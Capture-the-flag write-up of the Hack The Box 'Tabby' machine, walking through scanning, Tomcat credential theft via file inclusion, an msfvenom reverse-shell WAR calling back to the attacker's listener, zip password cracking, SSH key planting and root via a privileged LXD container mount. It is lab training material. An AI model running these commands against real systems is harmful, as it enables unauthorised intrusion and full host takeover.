Hackthebox writeup - Tabby

Sat 26 September 2020

A writeup of how I approached the HTB target tabby. Hackthebox is a fun platform that lets you work on your enumeration, pentesting and hacking skills.

Getting information

Since this is a htb challenge we know the IP of the target, and our first goal is to learn as much as possible about the target.

  • -vv: Verbosity is increased 2x to allow us to see what Nmap is doing during the scan.
  • --reason: Adds a column to our map results for why Nmap classified it that port.
  • -Pn: Tells Nmap to skip the ping test and just scan our provided target since we know it's up (10.10.10.194).
  • -A: More aggressive scan including OS detection, Version detection, traceroute, script scanning.
  • --osscan-guess: Asks NMAP to guess the OS version if no perfect match found.
  • --version-all: Tries all version probs for every port.
  • -p-: Scan ports 1 - 65535.

PS: db_nmap can take alle the normal nmap options and parameters.

msf5 > db_nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.194
... a lot of waiting and output here ...
msf5 > services 10.10.10.194
Services
========

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
10.10.10.194  22    tcp    ssh   open   OpenSSH 8.2p1 Ubuntu 4 Ubuntu Linux; protocol 2.0
10.10.10.194  80    tcp    http  open   Apache httpd 2.4.41 (Ubuntu)
10.10.10.194  8080  tcp    http  open   Apache Tomcat

So, this box is probably related to htt and webpages to get foothold.

Visual inspection

Lets try to go to the open ports with our webbrowser.

Hover over the URLs to see if the reveal something. As we can see they give away a lot of stuff in the two pages we have found so far.

Most interesting so far is probably the domain megahosting.htb so let us add that to our hosts file so that we can browse the megahosting.htb site from our browser.

root@kali:~# vi /etc/hosts
root@kali:~# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali.localdomain        kali
10.10.10.194 megahosting.htb
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

With this small addition to our /etc/hosts file we can load the webpage by the name megahosting.htb, instead of ip-address:

Searching for hidden URLs

My goto tool for searching hidden URLs are nikto and dirb. Lets run them.

First we scan port 80:

tabby@kali:/mnt/hgfs/kali_share/tabby$ nikto -Cgidirs all -host 10.10.10.194
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.194
+ Target Hostname:    10.10.10.194
+ Target Port:        80
+ Start Time:         2020-09-26 10:39:21 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 26471 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2020-09-26 11:04:22 (GMT2) (1501 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!
tabby@kali:/mnt/hgfs/kali_share/tabby$

tabby@kali:~$ dirb http://10.10.10.194 /usr/share/dirb/wordlists/big.txt -X .txt,.php,,

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Sep 26 10:42:50 2020                                                                                                                                                                         
URL_BASE: http://10.10.10.194/                                                                                                                                                                               
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt                                                                                                                                                            
EXTENSIONS_LIST: (.txt,.php,,) | (.txt)(.php)() [NUM = 3]

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.194/ ----                                                                                                                                                                 
+ http://10.10.10.194/Readme.txt (CODE:200|SIZE:1574)                                                                                                                                                        
==> DIRECTORY: http://10.10.10.194/assets/                                                                                                                                                                   
+ http://10.10.10.194/favicon.ico (CODE:200|SIZE:766)                                                                                                                                                        
==> DIRECTORY: http://10.10.10.194/files/                                                                                                                                                                    
+ http://10.10.10.194/index.php (CODE:200|SIZE:14175)                                                                                                                                                        
+ http://10.10.10.194/news.php (CODE:200|SIZE:0)                                                                                                                                                             
+ http://10.10.10.194/server-status (CODE:403|SIZE:277)

---- Entering directory: http://10.10.10.194/assets/ ----
==> DIRECTORY: http://10.10.10.194/assets/css/                                                                                                                                                              
==> DIRECTORY: http://10.10.10.194/assets/fonts/                                                                                                                                                            
==> DIRECTORY: http://10.10.10.194/assets/images/                                                                                                                                                           
==> DIRECTORY: http://10.10.10.194/assets/js/

---- Entering directory: http://10.10.10.194/files/ ----
==> DIRECTORY: http://10.10.10.194/files/archive/                                                                                                                                                           
+ http://10.10.10.194/files/statement (CODE:200|SIZE:6507)

---- Entering directory: http://10.10.10.194/assets/css/ ----

---- Entering directory: http://10.10.10.194/assets/fonts/ ----

---- Entering directory: http://10.10.10.194/assets/images/ ----

---- Entering directory: http://10.10.10.194/assets/js/ ----
==> DIRECTORY: http://10.10.10.194/assets/js/vendor/

---- Entering directory: http://10.10.10.194/files/archive/ ----

---- Entering directory: http://10.10.10.194/assets/js/vendor/ ----

-----------------
END_TIME: Sat Sep 26 19:04:48 2020
DOWNLOADED: 552366 - FOUND: 6
tabby@kali:~$

... and port 8080:

tabby@kali:~$ nikto -Cgidirs all -host 10.10.10.194:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.194
+ Target Hostname:    10.10.10.194
+ Target Port:        8080
+ Start Time:         2020-09-26 10:40:14 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 26778 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-09-26 11:07:05 (GMT2) (1611 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
tabby@kali:~$

Exploiting tomcat

Lets poke around this tomcat server.

msf5 > use auxiliary/scanner/http/tomcat_enum
msf5 auxiliary(scanner/http/tomcat_enum) > set rhosts 10.10.10.194
rhosts => 10.10.10.194
msf5 auxiliary(scanner/http/tomcat_enum) > options

msf5 auxiliary(scanner/http/tomcat_enum) > set targeturi /manager
targeturi => /manager
msf5 auxiliary(scanner/http/tomcat_enum) > run

[*] http://10.10.10.194:8080/manager - Checking j_security_check...
[*] http://10.10.10.194:8080/manager - Server returned: 302
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'admin'
[+] http://10.10.10.194:8080/manager - Apache Tomcat admin found 
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'manager'
[+] http://10.10.10.194:8080/manager - Apache Tomcat manager found 
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'role1'
[+] http://10.10.10.194:8080/manager - Apache Tomcat role1 found 
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'root'
[+] http://10.10.10.194:8080/manager - Apache Tomcat root found 
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'tomcat'
[+] http://10.10.10.194:8080/manager - Apache Tomcat tomcat found 
[*] http://10.10.10.194:8080/manager - Apache Tomcat - Trying name: 'both'
[+] http://10.10.10.194:8080/manager - Apache Tomcat both found 
[+] http://10.10.10.194:8080/manager - Users found: admin, both, manager, role1, root, tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/http/tomcat_enum) > set targeturi /host-manager
targeturi => /host-manager
msf5 auxiliary(scanner/http/tomcat_enum) > run

[*] http://10.10.10.194:8080/host-manager - Checking j_security_check...
[*] http://10.10.10.194:8080/host-manager - Server returned: 302
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'admin'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat admin found 
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'manager'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat manager found 
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'role1'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat role1 found 
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'root'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat root found 
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'tomcat'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat tomcat found 
[*] http://10.10.10.194:8080/host-manager - Apache Tomcat - Trying name: 'both'
[+] http://10.10.10.194:8080/host-manager - Apache Tomcat both found 
[+] http://10.10.10.194:8080/host-manager - Users found: admin, both, manager, role1, root, tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_enum) > back

msf5 > use auxiliary/scanner/http/tomcat_mgr_login 
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description                                                                                   
   ----              ---------------                                                                 --------  -----------                                                                                   
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users                                                             
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5                                                           
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database                                  
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list                                         
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list                                             
   PASSWORD                                                                                          no        The HTTP password to specify for authentication                                               
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line                                                       
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]                                  
   RHOSTS                                                                                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'            
   RPORT             8080                                                                            yes       The target port (TCP)                                                                         
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections                                                    
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host                                              
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOST 10.10.10.194
RHOST => 10.10.10.194
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[-] 10.10.10.194:8080 - LOGIN FAILED: admin:admin (Incorrect)
...
[-] 10.10.10.194:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/http/tomcat_mgr_login) > msf5 auxiliary(scanner/http/tomcat_mgr_login) > set PASS_FILE /mnt/hgfs/kali_share/tools/rockyou.txt
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[-] 10.10.10.194:8080 - LOGIN FAILED: admin:admin (Incorrect)
...
[-] 10.10.10.194:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Ok, we have tried a lot of passwordguessing without success. Lets try another path.

A closer look at the php application

From our searches we know that we have at least 2 php files, index.php and news.php, where news.php actually do some kind of file include:

Lets try to include something else:

Ok, what was interesting. Can we get even more information?

... the page look blank, but we dont see any error. Is it really blank?

Success, we got something that look like credentials.

Write down the credentials in your loot file: tomcat:$3cureP4s5w0rd123!

Get shell access

In the previous step we got credentials that make us able to deploy an app using tomcats script/api features. So let us create our application:

tabby@kali:/mnt/hgfs/kali_share/tabby$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.17.12 LPORT=8001 -f war > reverse_tcp.war
Payload size: 1103 bytes
Final size of war file: 1103 bytes

Then we have to deploy it:

tabby@kali:/mnt/hgfs/kali_share/tabby$ curl -v -u 'tomcat':'$3cureP4s5w0rd123!' -T reverse_tcp.war 'http://10.10.10.194:8080/manager/text/deploy?path=/reverse&update=true'
* Trying 10.10.10.194:8080...
* Connected to 10.10.10.194 (10.10.10.194) port 8080 (#0)
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/reverse&update=true HTTP/1.1
> Host: 10.10.10.194:8080
> Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ==
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 1103
> Expect: 100-continue
>  
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Fri, 06 Aug 2021 08:21:25 GMT
< 
OK - Deployed application at context path [/reverse]
* Connection #0 to host 10.10.10.194 left intact

Check the name of the page:

tabby@kali:/mnt/hgfs/kali_share/tabby$ unzip reverse_tcp.war 
Archive:  reverse_tcp.war
  inflating: WEB-INF/web.xml         
  inflating: kgfgjgpuxxewhnf.jsp

Start the netcat listener:

tabby@kali:/mnt/hgfs/kali_share/tabby$ nc -lvnp 8001

Visit the page:

tabby@kali:/mnt/hgfs/kali_share/tabby$ curl http://10.10.10.194:8080/reverse/kgfgjgpuxxewhnf.jsp

Success... We now have a shell in our netcat listener:

tabby@kali:/mnt/hgfs/kali_share/tabby$ nc -lvnp 8001
listening on [any] 8001 ...
connect to [10.10.17.12] from (UNKNOWN) [10.10.10.194] 57490
ls
conf
lib
logs
policy
webapps
work
pwd
/var/lib/tomcat9

Quest for the userflag

We have a simplistic shell, so let us see what we can get.

ls -la /var/www/html/files
total 36
drwxr-xr-x 4 ash  ash  4096 Jun 17  2020 .
drwxr-xr-x 4 root root 4096 Jun 17  2020 ..
-rw-r--r-- 1 ash  ash  8716 Jun 16  2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Jun 16  2020 archive
drwxr-xr-x 2 root root 4096 Jun 16  2020 revoked_certs
-rw-r--r-- 1 root root 6507 Jun 16  2020 statement

Here we can see a backup archive, which might contain interesting stuff, so download and unzip it.

tabby@kali:/mnt/hgfs/kali_share/tabby$ curl http://10.10.10.194/files/16162020_backup.zip --output 16162020_backup.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8716  100  8716    0     0  37089      0 --:--:-- --:--:-- --:--:-- 37089

tabby@kali:/mnt/hgfs/kali_share/tabby$ unzip 16162020_backup.zip 
Archive:  16162020_backup.zip
   creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: 
password incorrect--reenter: 
   skipping: var/www/html/favicon.ico  incorrect password
   creating: var/www/html/files/
   skipping: var/www/html/index.php  incorrect password
   skipping: var/www/html/logo.png   incorrect password
   skipping: var/www/html/news.php   incorrect password
   skipping: var/www/html/Readme.txt  incorrect password

Hmm... it is passwordprotected, and I tried the only password I got, but it was incorrect. Let's use zip2john to generate hashes that we can feed to john passwordcracker:

tabby@kali:/mnt/hgfs/kali_share/tabby$ zip2john 16162020_backup.zip > tabbyzip.txt
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

tabby@kali:/mnt/hgfs/kali_share/tabby$ cat tabbyzip.txt 
16162020_backup.zip:$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip

tabby@kali:/mnt/hgfs/kali_share/tabby$ john tabbyzip.txt --session=rockyou --wordlist=rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:09 DONE (2021-08-06 11:04) 0.1033g/s 1070Kp/s 1070Kc/s 1070KC/s adnc153..adilizinha
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Write down the new credentials in your loot file: 'admin@it' before you unzip the file and examine the content:

tabby@kali:/mnt/hgfs/kali_share/tabby$ unzip -P 'admin@it' 16162020_backup.zip 
Archive:  16162020_backup.zip
  inflating: var/www/html/favicon.ico  
  inflating: var/www/html/index.php  
 extracting: var/www/html/logo.png   
  inflating: var/www/html/news.php   
  inflating: var/www/html/Readme.txt

tabby@kali:/mnt/hgfs/kali_share/tabby$ tree var/
var/
└── www
    └── html
        ├── assets
        ├── favicon.ico
        ├── files
        ├── index.php
        ├── logo.png
        ├── news.php
        └── Readme.txt

4 directories, 5 files

I found nothing interesting here, so I continue exploring the server withy my upgraded shell.

First upload a enumerationscript:

tabby@kali:/mnt/hgfs/kali_share/tabby$ curl -v -u 'tomcat':'$3cureP4s5w0rd123!' -T ../tools/peas/linPEAS/linpeas.sh 'http://10.10.10.194:8080/manager/text/deploy?path=/linpeas&update=true'
*   Trying 10.10.10.194:8080...
* Connected to 10.10.10.194 (10.10.10.194) port 8080 (#0)
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/linpeas&update=true HTTP/1.1
> Host: 10.10.10.194:8080
> Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ==
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 452465
> Expect: 100-continue
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Sat, 07 Aug 2021 08:19:53 GMT
< 
FAIL - Deployed application at context path [/linpeas] but context failed to start
* Connection #0 to host 10.10.10.194 left intact

Then execute it on tabby:

python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9/webapps$ chmod +x linpeas.war
tomcat@tabby:/var/lib/tomcat9/webapps$ ./linpeas.war
... lot of output here ...

You can choose to examine your linpeas result, or just see if someone has been lazy:

python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9/webapps$ su ash
Password: admin@it
ash@tabby:/var/lib/tomcat9/webapps$ cd
ash@tabby:~$ ls
user.txt
ash@tabby:~$ cat user.txt
efa3b0f4e416279894811fd064dc5e58

Ok, we got user. Let us insert our ssh-key for proper access:

ash@tabby:~$ mkdir .ssh
ash@tabby:~$ cd .ssh
ash@tabby:~/.ssh$ touch authorized_keys
ash@tabby:~/.ssh$ echo ssh-rsa AAA...NgQ== tabby@kali > ~/.ssh/authorized_keys

And test it:

tabby@kali:/mnt/hgfs/kali_share/tabby$ ssh ash@10.10.10.194
Enter passphrase for key '/home/tabby/.ssh/id_rsa': 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)
...
Last login: Tue May 19 11:48:00 2020
ash@tabby:~$ history

Let us run enumerationscripts again, now as ash:

ash@tabby:/var/lib/tomcat9/webapps$ ./linpea.war 
... lot of output ...
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

### SCAN COMPLETE ####################################
ash@tabby:/var/lib/tomcat9/webapps$

Ok, we have a possibly attackvector through lxd. Search the Internet for resources, and learn from them.

My favoriute enumerationscript can be found here:

LinPEAS: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

LinEnum: https://github.com/rebootuser/LinEnum

Suid3num: https://github.com/Anon-Exploiter/SUID3NUM

LXC / LXD priviliege escalation

In addition to the official documentation sites I found this one particular useful: https://reboare.github.io/lxd/lxd-escape.html

Download the lxc image files from: https://uk.images.linuxcontainers.org/images/alpine/3.14/amd64/default/20210806_13:00/ , and transfer them to tabby with scp:

tabby@kali:/mnt/hgfs/kali_share/tabby$ scp lxd.tar.xz ash@10.10.10.194:~
Enter passphrase for key '/home/tabby/.ssh/id_rsa': 
lxd.tar.xz                                                                                                                                                                                               100%  864     4.6KB/s   00:00    
tabby@kali:/mnt/hgfs/kali_share/tabby$ scp rootfs.squashfs ash@10.10.10.194:~
Enter passphrase for key '/home/tabby/.ssh/id_rsa': 
rootfs.squashfs                                                                                                                                                                                          100% 2500KB 539.1KB/s   00:04

Import the image:

ash@tabby:~$ lxc image import lxd.tar.xz rootfs.squashfs --alias custom-imagename
Image imported with fingerprint: 44e52cd581bc522c75aa847ece333f12d662ed134b0f95dfe9e2679b43dd0505
ash@tabby:~$ lxc image list
+------------------+--------------+--------+------------------------------------------+--------------+-----------+--------+-----------------------------+
|      ALIAS       | FINGERPRINT  | PUBLIC |               DESCRIPTION                | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE         |
+------------------+--------------+--------+------------------------------------------+--------------+-----------+--------+-----------------------------+
| custom-imagename | 44e52cd581bc | no     | Alpinelinux 3.14 x86_64 (20210806_13:00) | x86_64       | CONTAINER | 2.44MB | Aug 7, 2021 at 9:48am (UTC) |
+------------------+--------------+--------+------------------------------------------+--------------+-----------+--------+-----------------------------+

Setup storage:

ash@tabby:~$ lxc storage create pool1 dir
Storage pool pool1 created

Initialize the image:

ash@tabby:~$ lxc init custom-imagename test -c security.privileged=true -s pool1
Creating test

The instance you are starting doesn't have any network attached to it.
  To create a new network, use: lxc network create
  To attach a network to an instance, use: lxc network attach

Mount tabby root inside the lxc container:

ash@tabby:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true 
Device whatever added to test

Login to the lxc container, note that you are root inside the container:

ash@tabby:~$ lxc exec test sh
~ # cd /mnt/root/
/mnt/root # ls
bin         cdrom       etc         lib         lib64       lost+found  mnt         proc        run         snap        swap.img    tmp         var
boot        dev         home        lib32       libx32      media       opt         root        sbin        srv         sys         usr
/mnt/root # cd root/
/mnt/root/root # ls
root.txt  snap
/mnt/root/root # cat root.txt 
0945764d3b927b1e83ff77b381ddd9e2

Congratulations. Submit your flag and take a rest :)

Comments